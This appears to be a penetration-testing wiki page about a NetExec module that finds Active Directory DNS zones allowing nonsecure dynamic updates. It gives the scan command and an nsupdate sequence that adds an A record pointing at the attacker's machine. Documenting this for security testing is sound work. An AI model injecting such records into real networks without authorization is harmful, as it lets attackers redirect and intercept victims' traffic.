🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ”§ NetExec Wiki / Enumerate Unsecure DNS Zones

πŸ†• Enumerate Unsecure DNS Zones

This module enumerates DNS zones that are configured with the Nonsecure and secure setting for dynamic updates. This misconfiguration allows unauthenticated users to add DNS records and, in some cases, delete or modify existing records.

nxc smb <dc-ip> -u <username> -p <password> -M dns-nonsecure

Exploitation

If you find misconfigured zones, you can interact with dynamic updates through nsupdate. Here is an example of adding an A record that points to the attacker machine:

nsupdate
> server <target>
> zone <zone>
> update add <record>.<zone> 0 A <local-ip>
> show
> send